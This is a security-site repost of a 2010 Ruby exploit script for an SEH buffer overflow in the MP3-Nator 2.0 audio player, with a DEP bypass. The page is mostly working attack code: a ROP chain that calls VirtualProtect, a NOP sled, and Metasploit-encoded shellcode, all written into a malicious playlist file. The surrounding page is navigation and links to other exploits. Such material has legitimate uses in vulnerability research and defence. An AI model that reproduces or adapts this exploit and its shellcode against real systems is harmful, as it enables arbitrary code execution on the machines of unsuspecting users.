首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MP3-Nator Buffer Overflow (SEH - DEP BYPASS)
来源:mind1355[at]gmail[dot]com 作者:Ramli 发布时间:2010-11-19  

# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)
# Date: 18-11-2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: C4SS!0 G0M3S
# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
# Version: 2.0
# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
 
#! /usr/bin/env ruby
filename = 'crash.plf'

# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\x00' -t ruby
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)
shellcode =
"\x89\xe3\xda\xcf\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x47\x70\x43\x30" +
"\x47\x70\x43\x50\x4e\x69\x48\x65\x50\x31\x48\x52\x43\x54" +
"\x4c\x4b\x51\x42\x46\x50\x4e\x6b\x50\x52\x44\x4c\x4c\x4b" +
"\x50\x52\x46\x74\x4e\x6b\x51\x62\x45\x78\x46\x6f\x4c\x77" +
"\x43\x7a\x47\x56\x50\x31\x49\x6f\x45\x61\x49\x50\x4e\x4c" +
"\x47\x4c\x45\x31\x43\x4c\x47\x72\x44\x6c\x51\x30\x4f\x31" +
"\x48\x4f\x46\x6d\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32" +
"\x43\x67\x4c\x4b\x46\x32\x46\x70\x4e\x6b\x43\x72\x47\x4c" +
"\x47\x71\x48\x50\x4c\x4b\x47\x30\x43\x48\x4b\x35\x4b\x70" +
"\x50\x74\x43\x7a\x47\x71\x4e\x30\x42\x70\x4c\x4b\x51\x58" +
"\x42\x38\x4c\x4b\x42\x78\x51\x30\x46\x61\x48\x53\x49\x73" +
"\x47\x4c\x43\x79\x4e\x6b\x44\x74\x4e\x6b\x45\x51\x49\x46" +
"\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c\x4f\x31\x48\x4f" +
"\x46\x6d\x43\x31\x4a\x67\x47\x48\x4d\x30\x50\x75\x48\x74" +
"\x47\x73\x43\x4d\x4a\x58\x45\x6b\x43\x4d\x47\x54\x42\x55" +
"\x4b\x52\x50\x58\x4c\x4b\x50\x58\x45\x74\x47\x71\x4e\x33" +
"\x51\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x46\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4e\x6b\x44\x44\x4c\x4b\x46\x61\x4a\x70" +
"\x4f\x79\x50\x44\x44\x64\x44\x64\x51\x4b\x43\x6b\x51\x71" +
"\x43\x69\x50\x5a\x42\x71\x4b\x4f\x4d\x30\x46\x38\x43\x6f" +
"\x50\x5a\x4c\x4b\x47\x62\x48\x6b\x4f\x76\x43\x6d\x43\x5a" +
"\x43\x31\x4c\x4d\x4e\x65\x48\x39\x45\x50\x47\x70\x47\x70" +
"\x46\x30\x42\x48\x46\x51\x4e\x6b\x42\x4f\x4e\x67\x49\x6f" +
"\x4e\x35\x4d\x6b\x4b\x4e\x46\x6e\x44\x72\x4a\x4a\x50\x68" +
"\x4c\x66\x4a\x35\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c" +
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x4b\x4b\x4d\x30\x44\x35" +
"\x45\x55\x4f\x4b\x47\x37\x47\x63\x43\x42\x50\x6f\x51\x7a" +
"\x45\x50\x42\x73\x4b\x4f\x49\x45\x45\x33\x43\x51\x50\x6c" +
"\x51\x73\x45\x50\x47\x7a\x41\x41"

junk1  =  'A' * 28

# ROP1
rop1 =  ''
rop1 << [0x71ABDAC3].pack('V') # PUSH ESP # POP ESI # RETN  [Module : WS2_32.dll]
rop1 << [0x71ABDC56].pack('V')   # MOV EAX,ESI # POP ESI # RETN  [Module : WS2_32.dll]
rop1 << "DEAD"     # PADDING
rop1 << [0x1001595E].pack('V') # ADD ESP,20 # RETN - xaudio.dll

# VIRTUALPROTECT PARAMETERS
params = ''
params << [0x7C801AD4].pack('V') # VirtualProtect
params << 'WWWW'     # return address [ PARAM #1 ]
params << 'XXXX'     # lpAddress      [ PARAM #2 ]
params << 'YYYY'     # Size           [ PARAM #3 ]
params << 'ZZZZ'     # flNewProtect   [ PARAM #4 ]
params << [0x5ADA1005].pack('V') # writeable address
params << 'BEEF' * 2    # PADDING

# ROP2 - [ PARAM #1 ]
rop2 =  ''
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN  [Module : ole32.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2 << "BEEF"     # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2 << 'BEEF'     # PADDING
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2 << 'BEEF'

# ROP2 - [ PARAM #2 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN  [Module : ole32.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2 << 'BEEF'     # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN  [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2 << 'BEEF'

# rop2 - [ PARAM #3 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN  [Module : ole32.dll]
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN  [Module : RPCRT4.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2 << 'BEEF'     # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2 << 'BEEF'     # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2 << 'BEEF'     # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN  [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2 << 'BEEF'

# rop2 - [ PARAM #4 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN  [Module : ole32.dll]
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN  [Module : RPCRT4.dll]
rop2 << [0x77C4EC1D].pack('V') # ADD EAX,40 # POP EBP # RETN  [Module : msvcrt.dll]
rop2 << 'BEEF'     # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN  [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2 << 'BEEF'

# POINT ESP TO VIRTUALPROTECT
rop2 << [0x7475B960].pack('V') # XCHG EAX,ESP # RETN  [Module : MSCTF.dll]
nops = "\x90" * 310

junk1 = junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)

seh  =  [0x10019C35].pack('V') # ADD ESP,41C # RETN - xaudio.dll
junk2 =  'C' * (10000 - (junk1 + seh).length)
xploit = junk1 + seh + junk2

File.open(filename,'w') do |fd|
 fd.write xploit
 puts "file size : #{xploit.length.to_s}"
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·chCounter <= 3.1.3 SQL Injecti
·Mosets Tree 2.1.6 (Joomla) Tem
·DIZzy 1.12 Local Stack Overflo
·DATAC RealWin SCADA Server Buf
·Xion Audio Player 1.0.126 Buff
·Trend Micro Internet Security
·FreeNAS exec_raw.php Arbitrary
·NetWare 6.5 SunRPC Portmapper
·Native Instruments Kontakt 4 P
·Axis2 / SAP BusinessObjects ds
·Native Instruments Traktor Pro
·Safari 5.02 Stack Overflow Den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved